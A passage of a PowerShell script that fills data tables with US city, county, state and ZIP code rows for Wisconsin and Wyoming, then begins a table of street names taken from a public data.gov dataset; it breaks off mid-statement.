$Cities.Rows.Add("Siren","Burnett","Wisconsin","WI","55","54872") + $null = $Cities.Rows.Add("Barnes","Douglas","Wisconsin","WI","55","54873") + $null = $Cities.Rows.Add("Wentworth","Douglas","Wisconsin","WI","55","54874") + $null = $Cities.Rows.Add("Earl","Washburn","Wisconsin","WI","55","54875") + $null = $Cities.Rows.Add("Stone lake","Sawyer","Wisconsin","WI","55","54876") + $null = $Cities.Rows.Add("Superior","Douglas","Wisconsin","WI","55","54880") + $null = $Cities.Rows.Add("Trego","Washburn","Wisconsin","WI","55","54888") + $null = $Cities.Rows.Add("Turtle lake","Barron","Wisconsin","WI","55","54889") + $null = $Cities.Rows.Add("Washburn","Bayfield","Wisconsin","WI","55","54891") + $null = $Cities.Rows.Add("Webster","Burnett","Wisconsin","WI","55","54893") + $null = $Cities.Rows.Add("Weyerhaeuser","Rusk","Wisconsin","WI","55","54895") + $null = $Cities.Rows.Add("Loretta","Sawyer","Wisconsin","WI","55","54896") + $null = $Cities.Rows.Add("Zcta 548hh","Ashland","Wisconsin","WI","55","548HH") + $null = $Cities.Rows.Add("Zcta 548xx","Bayfield","Wisconsin","WI","55","548XX") + $null = $Cities.Rows.Add("Oshkosh","Winnebago","Wisconsin","WI","55","54901") + $null = $Cities.Rows.Add("Oshkosh","Winnebago","Wisconsin","WI","55","54902") + $null = $Cities.Rows.Add("Oshkosh","Winnebago","Wisconsin","WI","55","54904") + $null = $Cities.Rows.Add("Almond","Portage","Wisconsin","WI","55","54909") + $null = $Cities.Rows.Add("Appleton","Outagamie","Wisconsin","WI","55","54911") + $null = $Cities.Rows.Add("Appleton","Outagamie","Wisconsin","WI","55","54913") + $null = $Cities.Rows.Add("Appleton","Outagamie","Wisconsin","WI","55","54914") + $null = $Cities.Rows.Add("Appleton","Outagamie","Wisconsin","WI","55","54915") + $null = $Cities.Rows.Add("Bancroft","Portage","Wisconsin","WI","55","54921") + $null = $Cities.Rows.Add("Bear creek","Outagamie","Wisconsin","WI","55","54922") + $null = $Cities.Rows.Add("Berlin","Green Lake","Wisconsin","WI","55","54923") + $null = $Cities.Rows.Add("Butte des morts","Winnebago","Wisconsin","WI","55","54927") + $null = $Cities.Rows.Add("Caroline","Shawano","Wisconsin","WI","55","54928") + $null = $Cities.Rows.Add("Clintonville","Waupaca","Wisconsin","WI","55","54929") + $null = $Cities.Rows.Add("Coloma","Waushara","Wisconsin","WI","55","54930") + $null = $Cities.Rows.Add("Eldorado","Fond du Lac","Wisconsin","WI","55","54932") + $null = $Cities.Rows.Add("Embarrass","Waupaca","Wisconsin","WI","55","54933") + $null = $Cities.Rows.Add("Eureka","Winnebago","Wisconsin","WI","55","54934") + $null = $Cities.Rows.Add("Taycheedah","Fond du Lac","Wisconsin","WI","55","54935") + $null = $Cities.Rows.Add("North fond du la","Fond du Lac","Wisconsin","WI","55","54937") + $null = $Cities.Rows.Add("Fremont","Waupaca","Wisconsin","WI","55","54940") + $null = $Cities.Rows.Add("Green lake","Green Lake","Wisconsin","WI","55","54941") + $null = $Cities.Rows.Add("Greenville","Outagamie","Wisconsin","WI","55","54942") + $null = $Cities.Rows.Add("Hancock","Waushara","Wisconsin","WI","55","54943") + $null = $Cities.Rows.Add("Hortonville","Outagamie","Wisconsin","WI","55","54944") + $null = $Cities.Rows.Add("Iola","Waupaca","Wisconsin","WI","55","54945") + $null = $Cities.Rows.Add("Larsen","Winnebago","Wisconsin","WI","55","54947") + $null = $Cities.Rows.Add("Leopolis","Shawano","Wisconsin","WI","55","54948") + $null = $Cities.Rows.Add("Manawa","Waupaca","Wisconsin","WI","55","54949") + $null = $Cities.Rows.Add("Marion","Waupaca","Wisconsin","WI","55","54950") + $null = $Cities.Rows.Add("Menasha","Winnebago","Wisconsin","WI","55","54952") + $null = $Cities.Rows.Add("Neenah","Winnebago","Wisconsin","WI","55","54956") + $null = $Cities.Rows.Add("Neshkoro","Marquette","Wisconsin","WI","55","54960") + $null = $Cities.Rows.Add("New london","Waupaca","Wisconsin","WI","55","54961") + $null = $Cities.Rows.Add("Ogdensburg","Waupaca","Wisconsin","WI","55","54962") + $null = $Cities.Rows.Add("Omro","Winnebago","Wisconsin","WI","55","54963") + $null = $Cities.Rows.Add("Pickett","Winnebago","Wisconsin","WI","55","54964") + $null = $Cities.Rows.Add("Pine river","Waushara","Wisconsin","WI","55","54965") + $null = $Cities.Rows.Add("Plainfield","Waushara","Wisconsin","WI","55","54966") + $null = $Cities.Rows.Add("Poy sippi","Waushara","Wisconsin","WI","55","54967") + $null = $Cities.Rows.Add("Princeton","Green Lake","Wisconsin","WI","55","54968") + $null = $Cities.Rows.Add("Redgranite","Waushara","Wisconsin","WI","55","54970") + $null = $Cities.Rows.Add("Ripon","Fond du Lac","Wisconsin","WI","55","54971") + $null = $Cities.Rows.Add("Rosendale","Fond du Lac","Wisconsin","WI","55","54974") + $null = $Cities.Rows.Add("Saxeville","Waushara","Wisconsin","WI","55","54976") + $null = $Cities.Rows.Add("Scandinavia","Waupaca","Wisconsin","WI","55","54977") + $null = $Cities.Rows.Add("Tilleda","Shawano","Wisconsin","WI","55","54978") + $null = $Cities.Rows.Add("Van dyne","Fond du Lac","Wisconsin","WI","55","54979") + $null = $Cities.Rows.Add("Waukau","Winnebago","Wisconsin","WI","55","54980") + $null = $Cities.Rows.Add("Waupaca","Waupaca","Wisconsin","WI","55","54981") + $null = $Cities.Rows.Add("Wautoma","Waushara","Wisconsin","WI","55","54982") + $null = $Cities.Rows.Add("Weyauwega","Waupaca","Wisconsin","WI","55","54983") + $null = $Cities.Rows.Add("Wild rose","Waushara","Wisconsin","WI","55","54984") + $null = $Cities.Rows.Add("Winnebago","Winnebago","Wisconsin","WI","55","54985") + $null = $Cities.Rows.Add("Winneconne","Winnebago","Wisconsin","WI","55","54986") + $null = $Cities.Rows.Add("Zcta 549hh","Calumet","Wisconsin","WI","55","549HH") + $null = $Cities.Rows.Add("Cheyenne","Laramie","Wyoming","WY","56","82001") + $null = $Cities.Rows.Add("Cheyenne","Laramie","Wyoming","WY","56","82007") + $null = $Cities.Rows.Add("Cheyenne","Laramie","Wyoming","WY","56","82009") + $null = $Cities.Rows.Add("Albin","Laramie","Wyoming","WY","56","82050") + $null = $Cities.Rows.Add("Laramie","Albany","Wyoming","WY","56","82051") + $null = $Cities.Rows.Add("Buford","Albany","Wyoming","WY","56","82052") + $null = $Cities.Rows.Add("Burns","Laramie","Wyoming","WY","56","82053") + $null = $Cities.Rows.Add("Carpenter","Laramie","Wyoming","WY","56","82054") + $null = $Cities.Rows.Add("Centennial","Albany","Wyoming","WY","56","82055") + $null = $Cities.Rows.Add("Garrett","Albany","Wyoming","WY","56","82058") + $null = $Cities.Rows.Add("Granite canon","Laramie","Wyoming","WY","56","82059") + $null = $Cities.Rows.Add("Hillsdale","Laramie","Wyoming","WY","56","82060") + $null = $Cities.Rows.Add("Horse creek","Laramie","Wyoming","WY","56","82061") + $null = $Cities.Rows.Add("Jelm","Albany","Wyoming","WY","56","82063") + $null = $Cities.Rows.Add("Laramie","Albany","Wyoming","WY","56","82070") + $null = $Cities.Rows.Add("Zcta 82072","Albany","Wyoming","WY","56","82072") + $null = $Cities.Rows.Add("Meriden","Laramie","Wyoming","WY","56","82081") + $null = $Cities.Rows.Add("Pine bluffs","Laramie","Wyoming","WY","56","82082") + $null = $Cities.Rows.Add("Rock river","Albany","Wyoming","WY","56","82083") + $null = $Cities.Rows.Add("Tie siding","Albany","Wyoming","WY","56","82084") + $null = $Cities.Rows.Add("Fishing bridge","Park","Wyoming","WY","56","82190") + $null = $Cities.Rows.Add("Wheatland","Platte","Wyoming","WY","56","82201") + $null = $Cities.Rows.Add("Chugwater","Platte","Wyoming","WY","56","82210") + $null = $Cities.Rows.Add("Fort laramie","Goshen","Wyoming","WY","56","82212") + $null = $Cities.Rows.Add("Glendo","Platte","Wyoming","WY","56","82213") + $null = $Cities.Rows.Add("Guernsey","Platte","Wyoming","WY","56","82214") + $null = $Cities.Rows.Add("Hartville","Platte","Wyoming","WY","56","82215") + $null = $Cities.Rows.Add("Hawk springs","Goshen","Wyoming","WY","56","82217") + $null = $Cities.Rows.Add("Huntley","Goshen","Wyoming","WY","56","82218") + $null = $Cities.Rows.Add("Jay em","Goshen","Wyoming","WY","56","82219") + $null = $Cities.Rows.Add("Lagrange","Goshen","Wyoming","WY","56","82221") + $null = $Cities.Rows.Add("Lance creek","Niobrara","Wyoming","WY","56","82222") + $null = $Cities.Rows.Add("Lingle","Goshen","Wyoming","WY","56","82223") + $null = $Cities.Rows.Add("Lost springs","Converse","Wyoming","WY","56","82224") + $null = $Cities.Rows.Add("Lusk","Niobrara","Wyoming","WY","56","82225") + $null = $Cities.Rows.Add("Manville","Niobrara","Wyoming","WY","56","82227") + $null = $Cities.Rows.Add("Torrington","Goshen","Wyoming","WY","56","82240") + $null = $Cities.Rows.Add("Van tassell","Niobrara","Wyoming","WY","56","82242") + $null = $Cities.Rows.Add("Veteran","Goshen","Wyoming","WY","56","82243") + $null = $Cities.Rows.Add("Yoder","Goshen","Wyoming","WY","56","82244") + $null = $Cities.Rows.Add("Zcta 822hh","Platte","Wyoming","WY","56","822HH") + $null = $Cities.Rows.Add("Rawlins","Carbon","Wyoming","WY","56","82301") + $null = $Cities.Rows.Add("Jeffrey city","Fremont","Wyoming","WY","56","82310") + $null = $Cities.Rows.Add("Baggs","Carbon","Wyoming","WY","56","82321") + $null = $Cities.Rows.Add("Bairoil","Sweetwater","Wyoming","WY","56","82322") + $null = $Cities.Rows.Add("Dixon","Carbon","Wyoming","WY","56","82323") + $null = $Cities.Rows.Add("Elk mountain","Carbon","Wyoming","WY","56","82324") + $null = $Cities.Rows.Add("Encampment","Carbon","Wyoming","WY","56","82325") + $null = $Cities.Rows.Add("Hanna","Carbon","Wyoming","WY","56","82327") + $null = $Cities.Rows.Add("Medicine bow","Carbon","Wyoming","WY","56","82329") + $null = $Cities.Rows.Add("Ryan park","Carbon","Wyoming","WY","56","82331") + $null = $Cities.Rows.Add("Savery","Carbon","Wyoming","WY","56","82332") + $null = $Cities.Rows.Add("Walcott","Carbon","Wyoming","WY","56","82335") + $null = $Cities.Rows.Add("Wamsutter","Sweetwater","Wyoming","WY","56","82336") + $null = $Cities.Rows.Add("Zcta 823hh","Carbon","Wyoming","WY","56","823HH") + $null = $Cities.Rows.Add("Worland","Washakie","Wyoming","WY","56","82401") + $null = $Cities.Rows.Add("Basin","Big Horn","Wyoming","WY","56","82410") + $null = $Cities.Rows.Add("Burlington","Big Horn","Wyoming","WY","56","82411") + $null = $Cities.Rows.Add("Byron","Big Horn","Wyoming","WY","56","82412") + $null = $Cities.Rows.Add("Cody","Park","Wyoming","WY","56","82414") + $null = $Cities.Rows.Add("Cowley","Big Horn","Wyoming","WY","56","82420") + $null = $Cities.Rows.Add("Deaver","Big Horn","Wyoming","WY","56","82421") + $null = $Cities.Rows.Add("Emblem","Big Horn","Wyoming","WY","56","82422") + $null = $Cities.Rows.Add("Frannie","Park","Wyoming","WY","56","82423") + $null = $Cities.Rows.Add("Greybull","Big Horn","Wyoming","WY","56","82426") + $null = $Cities.Rows.Add("Hyattville","Big Horn","Wyoming","WY","56","82428") + $null = $Cities.Rows.Add("Kirby","Hot Springs","Wyoming","WY","56","82430") + $null = $Cities.Rows.Add("Lovell","Big Horn","Wyoming","WY","56","82431") + $null = $Cities.Rows.Add("Manderson","Big Horn","Wyoming","WY","56","82432") + $null = $Cities.Rows.Add("Meeteetse","Park","Wyoming","WY","56","82433") + $null = $Cities.Rows.Add("Otto","Big Horn","Wyoming","WY","56","82434") + $null = $Cities.Rows.Add("Powell","Park","Wyoming","WY","56","82435") + $null = $Cities.Rows.Add("Ralston","Park","Wyoming","WY","56","82440") + $null = $Cities.Rows.Add("Shell","Big Horn","Wyoming","WY","56","82441") + $null = $Cities.Rows.Add("Ten sleep","Washakie","Wyoming","WY","56","82442") + $null = $Cities.Rows.Add("Grass creek","Hot Springs","Wyoming","WY","56","82443") + $null = $Cities.Rows.Add("Zcta 824hh","Big Horn","Wyoming","WY","56","824HH") + $null = $Cities.Rows.Add("Zcta 824xx","Big Horn","Wyoming","WY","56","824XX") + $null = $Cities.Rows.Add("Gas hills","Fremont","Wyoming","WY","56","82501") + $null = $Cities.Rows.Add("Arapahoe","Fremont","Wyoming","WY","56","82510") + $null = $Cities.Rows.Add("Crowheart","Fremont","Wyoming","WY","56","82512") + $null = $Cities.Rows.Add("Dubois","Fremont","Wyoming","WY","56","82513") + $null = $Cities.Rows.Add("Fort washakie","Fremont","Wyoming","WY","56","82514") + $null = $Cities.Rows.Add("Hudson","Fremont","Wyoming","WY","56","82515") + $null = $Cities.Rows.Add("Kinnear","Fremont","Wyoming","WY","56","82516") + $null = $Cities.Rows.Add("Ethete","Fremont","Wyoming","WY","56","82520") + $null = $Cities.Rows.Add("Pavillion","Fremont","Wyoming","WY","56","82523") + $null = $Cities.Rows.Add("Zcta 825hh","Fremont","Wyoming","WY","56","825HH") + $null = $Cities.Rows.Add("Casper","Natrona","Wyoming","WY","56","82601") + $null = $Cities.Rows.Add("Casper","Natrona","Wyoming","WY","56","82604") + $null = $Cities.Rows.Add("Casper","Natrona","Wyoming","WY","56","82609") + $null = $Cities.Rows.Add("Alcova","Natrona","Wyoming","WY","56","82620") + $null = $Cities.Rows.Add("Douglas","Converse","Wyoming","WY","56","82633") + $null = $Cities.Rows.Add("Edgerton","Natrona","Wyoming","WY","56","82635") + $null = $Cities.Rows.Add("Evansville","Natrona","Wyoming","WY","56","82636") + $null = $Cities.Rows.Add("Glenrock","Converse","Wyoming","WY","56","82637") + $null = $Cities.Rows.Add("Kaycee","Johnson","Wyoming","WY","56","82639") + $null = $Cities.Rows.Add("Linch","Johnson","Wyoming","WY","56","82640") + $null = $Cities.Rows.Add("Lysite","Fremont","Wyoming","WY","56","82642") + $null = $Cities.Rows.Add("Midwest","Natrona","Wyoming","WY","56","82643") + $null = $Cities.Rows.Add("Mills","Natrona","Wyoming","WY","56","82644") + $null = $Cities.Rows.Add("Shoshoni","Fremont","Wyoming","WY","56","82649") + $null = $Cities.Rows.Add("Zcta 826hh","Converse","Wyoming","WY","56","826HH") + $null = $Cities.Rows.Add("Newcastle","Weston","Wyoming","WY","56","82701") + $null = $Cities.Rows.Add("Aladdin","Crook","Wyoming","WY","56","82710") + $null = $Cities.Rows.Add("Alva","Crook","Wyoming","WY","56","82711") + $null = $Cities.Rows.Add("Beulah","Crook","Wyoming","WY","56","82712") + $null = $Cities.Rows.Add("Devils tower","Crook","Wyoming","WY","56","82714") + $null = $Cities.Rows.Add("Gillette","Campbell","Wyoming","WY","56","82716") + $null = $Cities.Rows.Add("Gillette","Campbell","Wyoming","WY","56","82717") + $null = $Cities.Rows.Add("Gillette","Campbell","Wyoming","WY","56","82718") + $null = $Cities.Rows.Add("Hulett","Crook","Wyoming","WY","56","82720") + $null = $Cities.Rows.Add("Pine haven","Crook","Wyoming","WY","56","82721") + $null = $Cities.Rows.Add("Osage","Weston","Wyoming","WY","56","82723") + $null = $Cities.Rows.Add("Recluse","Campbell","Wyoming","WY","56","82725") + $null = $Cities.Rows.Add("Rozet","Campbell","Wyoming","WY","56","82727") + $null = $Cities.Rows.Add("Sundance","Crook","Wyoming","WY","56","82729") + $null = $Cities.Rows.Add("Upton","Weston","Wyoming","WY","56","82730") + $null = $Cities.Rows.Add("Gillette","Campbell","Wyoming","WY","56","82731") + $null = $Cities.Rows.Add("Wright","Campbell","Wyoming","WY","56","82732") + $null = $Cities.Rows.Add("Sheridan","Sheridan","Wyoming","WY","56","82801") + $null = $Cities.Rows.Add("Arvada","Sheridan","Wyoming","WY","56","82831") + $null = $Cities.Rows.Add("Banner","Sheridan","Wyoming","WY","56","82832") + $null = $Cities.Rows.Add("Big horn","Sheridan","Wyoming","WY","56","82833") + $null = $Cities.Rows.Add("Buffalo","Johnson","Wyoming","WY","56","82834") + $null = $Cities.Rows.Add("Clearmont","Sheridan","Wyoming","WY","56","82835") + $null = $Cities.Rows.Add("Dayton","Sheridan","Wyoming","WY","56","82836") + $null = $Cities.Rows.Add("Leiter","Sheridan","Wyoming","WY","56","82837") + $null = $Cities.Rows.Add("Parkman","Sheridan","Wyoming","WY","56","82838") + $null = $Cities.Rows.Add("Acme","Sheridan","Wyoming","WY","56","82839") + $null = $Cities.Rows.Add("Story","Sheridan","Wyoming","WY","56","82842") + $null = $Cities.Rows.Add("Ranchester","Sheridan","Wyoming","WY","56","82844") + $null = $Cities.Rows.Add("Wyarno","Sheridan","Wyoming","WY","56","82845") + $null = $Cities.Rows.Add("Zcta 828hh","Johnson","Wyoming","WY","56","828HH") + $null = $Cities.Rows.Add("Rock springs","Sweetwater","Wyoming","WY","56","82901") + $null = $Cities.Rows.Add("Bondurant","Sublette","Wyoming","WY","56","82922") + $null = $Cities.Rows.Add("Boulder","Sublette","Wyoming","WY","56","82923") + $null = $Cities.Rows.Add("Cora","Sublette","Wyoming","WY","56","82925") + $null = $Cities.Rows.Add("Little america","Sweetwater","Wyoming","WY","56","82929") + $null = $Cities.Rows.Add("Evanston","Uinta","Wyoming","WY","56","82930") + $null = $Cities.Rows.Add("Farson","Sweetwater","Wyoming","WY","56","82932") + $null = $Cities.Rows.Add("Fort bridger","Uinta","Wyoming","WY","56","82933") + $null = $Cities.Rows.Add("Granger","Sweetwater","Wyoming","WY","56","82934") + $null = $Cities.Rows.Add("Green river","Sweetwater","Wyoming","WY","56","82935") + $null = $Cities.Rows.Add("Lonetree","Uinta","Wyoming","WY","56","82936") + $null = $Cities.Rows.Add("Lyman","Uinta","Wyoming","WY","56","82937") + $null = $Cities.Rows.Add("Mc kinnon","Sweetwater","Wyoming","WY","56","82938") + $null = $Cities.Rows.Add("Mountain view","Uinta","Wyoming","WY","56","82939") + $null = $Cities.Rows.Add("Pinedale","Sublette","Wyoming","WY","56","82941") + $null = $Cities.Rows.Add("Point of rocks","Sweetwater","Wyoming","WY","56","82942") + $null = $Cities.Rows.Add("Reliance","Sweetwater","Wyoming","WY","56","82943") + $null = $Cities.Rows.Add("Robertson","Uinta","Wyoming","WY","56","82944") + $null = $Cities.Rows.Add("Superior","Sweetwater","Wyoming","WY","56","82945") + $null = $Cities.Rows.Add("Zcta 829hh","Sublette","Wyoming","WY","56","829HH") + $null = $Cities.Rows.Add("Zcta 829xx","Sublette","Wyoming","WY","56","829XX") + $null = $Cities.Rows.Add("Colter bay","Teton","Wyoming","WY","56","83001") + $null = $Cities.Rows.Add("Kelly","Teton","Wyoming","WY","56","83011") + $null = $Cities.Rows.Add("Moose","Teton","Wyoming","WY","56","83012") + $null = $Cities.Rows.Add("Moran","Teton","Wyoming","WY","56","83013") + $null = $Cities.Rows.Add("Wilson","Teton","Wyoming","WY","56","83014") + $null = $Cities.Rows.Add("Zcta 830hh","Teton","Wyoming","WY","56","830HH") + $null = $Cities.Rows.Add("Zcta 830xx","Teton","Wyoming","WY","56","830XX") + $null = $Cities.Rows.Add("Kemmerer","Lincoln","Wyoming","WY","56","83101") + $null = $Cities.Rows.Add("Afton","Lincoln","Wyoming","WY","56","83110") + $null = $Cities.Rows.Add("Auburn","Lincoln","Wyoming","WY","56","83111") + $null = $Cities.Rows.Add("Bedford","Lincoln","Wyoming","WY","56","83112") + $null = $Cities.Rows.Add("Marbleton","Sublette","Wyoming","WY","56","83113") + $null = $Cities.Rows.Add("Cokeville","Lincoln","Wyoming","WY","56","83114") + $null = $Cities.Rows.Add("Daniel","Sublette","Wyoming","WY","56","83115") + $null = $Cities.Rows.Add("Diamondville","Lincoln","Wyoming","WY","56","83116") + $null = $Cities.Rows.Add("Etna","Lincoln","Wyoming","WY","56","83118") + $null = $Cities.Rows.Add("Fairview","Lincoln","Wyoming","WY","56","83119") + $null = $Cities.Rows.Add("Freedom","Lincoln","Wyoming","WY","56","83120") + $null = $Cities.Rows.Add("Frontier","Lincoln","Wyoming","WY","56","83121") + $null = $Cities.Rows.Add("Grover","Lincoln","Wyoming","WY","56","83122") + $null = $Cities.Rows.Add("La barge","Lincoln","Wyoming","WY","56","83123") + $null = $Cities.Rows.Add("Opal","Lincoln","Wyoming","WY","56","83124") + $null = $Cities.Rows.Add("Smoot","Lincoln","Wyoming","WY","56","83126") + $null = $Cities.Rows.Add("Thayne","Lincoln","Wyoming","WY","56","83127") + $null = $Cities.Rows.Add("Alpine","Lincoln","Wyoming","WY","56","83128") + $null = $Cities.Rows.Add("Zcta 831hh","Lincoln","Wyoming","WY","56","831HH") + $null = $Cities.Rows.Add("Zcta 831xx","Lincoln","Wyoming","WY","56","831XX") + + # Define Street Names + # https://catalog.data.gov/dataset/street-names + $Streets = New-Object System.Data.DataTable + $null = $Streets.Columns.Add("FullStreetName") + $null = $Streets.Columns.Add("PostDirection") + $null = $Streets.Columns.Add("StreetName") + $null = $Streets.Columns.Add("StreetType") + $null = $Streets.Rows.Add("01ST ST","","01ST","ST") + $null = $Streets.Rows.Add("02ND AVE","","02ND","AVE") + $null = $Streets.Rows.Add("02ND ST","","02ND","ST") + $null = $Streets.Rows.Add("02ND TI ST","","02ND TI","ST") + $null = $Streets.Rows.Add("03RD AVE","","03RD","AVE") + $null = $Streets.Rows.Add("03RD ST","","03RD","ST") + $null = $Streets.Rows.Add("03RD TI ST","","03RD TI","ST") + $null = $Streets.Rows.Add("04TH AVE","","04TH","AVE") + $null = $Streets.Rows.Add("04TH ST","","04TH","ST") + $null = $Streets.Rows.Add("04TH TI ST","","04TH TI","ST") + $null = $Streets.Rows.Add("05TH AVE","","05TH","AVE") + $null = $Streets.Rows.Add("05TH ST","","05TH","ST") + $null = $Streets.Rows.Add("05TH TI ST","","05TH TI","ST") + $null = $Streets.Rows.Add("06TH AVE","","06TH","AVE") + $null = $Streets.Rows.Add("06TH ST","","06TH","ST") + $null = $Streets.Rows.Add("06TH HP AVE","","06TH HP","AVE") + $null = $Streets.Rows.Add("06TH TI ST","","06TH TI","ST") + $null = $Streets.Rows.Add("07TH AVE","","07TH","AVE") + $null = $Streets.Rows.Add("07TH ST","","07TH","ST") + $null = $Streets.Rows.Add("08TH AVE","","08TH","AVE") + $null = $Streets.Rows.Add("08TH ST","","08TH","ST") + $null = $Streets.Rows.Add("08TH TI ST","","08TH TI","ST") + $null = $Streets.Rows.Add("09TH AVE","","09TH","AVE") + $null = $Streets.Rows.Add("09TH ST","","09TH","ST") + $null = $Streets.Rows.Add("09TH TI ST","","09TH TI","ST") + $null = $Streets.Rows.Add("10TH AVE","","10TH","AVE") + $null = $Streets.Rows.Add("10TH ST","","10TH","ST") + $null = $Streets.Rows.Add("10TH TI ST","","10TH TI","ST") + $null = $Streets.Rows.Add("11TH AVE","","11TH","AVE") + $null = $Streets.Rows.Add("11TH ST","","11TH","ST") + $null = $Streets.Rows.Add("11TH TI ST","","11TH TI","ST") + $null = $Streets.Rows.Add("12TH AVE","","12TH","AVE") + $null = $Streets.Rows.Add("12TH ST","","12TH","ST") + $null = $Streets.Rows.Add("12TH TI ST","","12TH TI","ST") + $null = $Streets.Rows.Add("13TH ST","","13TH","ST") + $null = $Streets.Rows.Add("13TH TI ST","","13TH TI","ST") + $null = $Streets.Rows.Add("14TH AVE","","14TH","AVE") + $null = $Streets.Rows.Add("14TH ST","","14TH","ST") + $null = $Streets.Rows.Add("14TH TI ST","","14TH TI","ST") + $null = $Streets.Rows.Add("15TH AVE","","15TH","AVE") + $null = $Streets.Rows.Add("15TH ST","","15TH","ST") + $null = $Streets.Rows.Add("16TH AVE","","16TH","AVE") + $null = $Streets.Rows.Add("16TH ST","","16TH","ST") + $null = $Streets.Rows.Add("17TH AVE","","17TH","AVE") + $null = $Streets.Rows.Add("17TH ST","","17TH","ST") + $null = $Streets.Rows.Add("18TH AVE","","18TH","AVE") + $null = $Streets.Rows.Add("18TH ST","","18TH","ST") + $null = $Streets.Rows.Add("19TH AVE","","19TH","AVE") + $null = $Streets.Rows.Add("19TH ST","","19TH","ST") + $null = $Streets.Rows.Add("20TH AVE","","20TH","AVE") + $null = $Streets.Rows.Add("20TH ST","","20TH","ST") + $null = $Streets.Rows.Add("21ST AVE","","21ST","AVE") + $null = $Streets.Rows.Add("21ST ST","","21ST","ST") + $null = $Streets.Rows.Add("22ND AVE","","22ND","AVE") + $null = $Streets.Rows.Add("22ND ST","","22ND","ST") + $null = $Streets.Rows.Add("23RD AVE","","23RD","AVE") + $null = $Streets.Rows.Add("23RD ST","","23RD","ST") + $null = $Streets.Rows.Add("24TH AVE","","24TH","AVE") + $null = $Streets.Rows.Add("24TH ST","","24TH","ST") + $null = $Streets.Rows.Add("25TH AVE","","25TH","AVE") + $null = $Streets.Rows.Add("SAM JORDANS WAY","","SAM JORDANS","WAY") + $null = $Streets.Rows.Add("25TH ST","","25TH","ST") + $null = $Streets.Rows.Add("26TH AVE","","26TH","AVE") + $null = $Streets.Rows.Add("26TH ST","","26TH","ST") + $null = $Streets.Rows.Add("27TH AVE","","27TH","AVE") + $null = $Streets.Rows.Add("27TH ST","","27TH","ST") + $null = $Streets.Rows.Add("28TH AVE","","28TH","AVE") + $null = $Streets.Rows.Add("28TH ST","","28TH","ST") + $null = $Streets.Rows.Add("29TH AVE","","29TH","AVE") + $null = $Streets.Rows.Add("29TH ST","","29TH","ST") + $null = $Streets.Rows.Add("30TH AVE","","30TH","AVE") + $null = $Streets.Rows.Add("30TH ST","","30TH","ST") + $null = $Streets.Rows.Add("31ST AVE","","31ST","AVE") + $null = $Streets.Rows.Add("31ST ST","","31ST","ST") + $null = $Streets.Rows.Add("32ND AVE","","32ND","AVE") + $null = $Streets.Rows.Add("33RD AVE","","33RD","AVE") + $null = $Streets.Rows.Add("34TH AVE","","34TH","AVE") + $null = $Streets.Rows.Add("35TH AVE","","35TH","AVE") + $null = $Streets.Rows.Add("36TH AVE","","36TH","AVE") + $null = $Streets.Rows.Add("37TH AVE","","37TH","AVE") + $null = $Streets.Rows.Add("38TH AVE","","38TH","AVE") + $null = $Streets.Rows.Add("39TH AVE","","39TH","AVE") + $null = $Streets.Rows.Add("40TH AVE","","40TH","AVE") + $null = $Streets.Rows.Add("41ST AVE","","41ST","AVE") + $null = $Streets.Rows.Add("42ND AVE","","42ND","AVE") + $null = $Streets.Rows.Add("43RD AVE","","43RD","AVE") + $null = $Streets.Rows.Add("44TH AVE","","44TH","AVE") + $null = $Streets.Rows.Add("45TH AVE","","45TH","AVE") + $null = $Streets.Rows.Add("46TH AVE","","46TH","AVE") + $null = $Streets.Rows.Add("47TH AVE","","47TH","AVE") + $null = $Streets.Rows.Add("48TH AVE","","48TH","AVE") + $null = $Streets.Rows.Add("A ST","","A","ST") + $null = $Streets.Rows.Add("ABBEY ST","","ABBEY","ST") + $null = $Streets.Rows.Add("TONI STONE XING","","TONI STONE","XING") + $null = $Streets.Rows.Add("ACACIA ST","","ACACIA","ST") + $null = $Streets.Rows.Add("ACADIA ST","","ACADIA","ST") + $null = $Streets.Rows.Add("ACEVEDO AVE","","ACEVEDO","AVE") + $null = $Streets.Rows.Add("ACME ALY","","ACME","ALY") + $null = $Streets.Rows.Add("ACORN ALY","","ACORN","ALY") + $null = $Streets.Rows.Add("ACTON ST","","ACTON","ST") + $null = $Streets.Rows.Add("ADA CT","","ADA","CT") + $null = $Streets.Rows.Add("ADAIR ST","","ADAIR","ST") + $null = $Streets.Rows.Add("ADAM ST","","ADAM","ST") + $null = $Streets.Rows.Add("ADDISON ST","","ADDISON","ST") + $null = $Streets.Rows.Add("ADELE CT","","ADELE","CT") + $null = $Streets.Rows.Add("ADMIRAL AVE","","ADMIRAL","AVE") + $null = $Streets.Rows.Add("ADOLPH SUTRO CT","","ADOLPH SUTRO","CT") + $null = $Streets.Rows.Add("AERIAL WAY","","AERIAL","WAY") + $null = $Streets.Rows.Add("AGNON AVE","","AGNON","AVE") + $null = $Streets.Rows.Add("AGUA WAY","","AGUA","WAY") + $null = $Streets.Rows.Add("AHERN WAY","","AHERN","WAY") + $null = $Streets.Rows.Add("ALABAMA ST","","ALABAMA","ST") + $null = $Streets.Rows.Add("ALADDIN TER","","ALADDIN","TER") + $null = $Streets.Rows.Add("ALAMEDA ST","","ALAMEDA","ST") + $null = $Streets.Rows.Add("ALANA WAY","","ALANA","WAY") + $null = $Streets.Rows.Add("ALBATROSS CT","","ALBATROSS","CT") + $null = $Streets.Rows.Add("ALBERTA ST","","ALBERTA","ST") + $null = $Streets.Rows.Add("ALBION ST","","ALBION","ST") + $null = $Streets.Rows.Add("ALDER ST","","ALDER","ST") + $null = $Streets.Rows.Add("ALEMANY BLVD","","ALEMANY","BLVD") + $null = $Streets.Rows.Add("ALEMANY BLVD OFF RAMP","","ALEMANY BLVD OFF","RAMP") + $null = $Streets.Rows.Add("ALERT ALY","","ALERT","ALY") + $null = $Streets.Rows.Add("ALHAMBRA ST","","ALHAMBRA","ST") + $null = $Streets.Rows.Add("ALICE B TOKLAS PL","","ALICE B TOKLAS","PL") + $null = $Streets.Rows.Add("ALLEN ST","","ALLEN","ST") + $null = $Streets.Rows.Add("ALLISON ST","","ALLISON","ST") + $null = $Streets.Rows.Add("ALLSTON WAY","","ALLSTON","WAY") + $null = $Streets.Rows.Add("ALMA ST","","ALMA","ST") + $null = $Streets.Rows.Add("ALMADEN CT","","ALMADEN","CT") + $null = $Streets.Rows.Add("ALOHA AVE","","ALOHA","AVE") + $null = $Streets.Rows.Add("ALPHA ST","","ALPHA","ST") + $null = $Streets.Rows.Add("ALPINE TER","","ALPINE","TER") + $null = $Streets.Rows.Add("ALTA ST","","ALTA","ST") + $null = $Streets.Rows.Add("ALTA MAR WAY","","ALTA MAR","WAY") + $null = $Streets.Rows.Add("ALTA VISTA TER","","ALTA VISTA","TER") + $null = 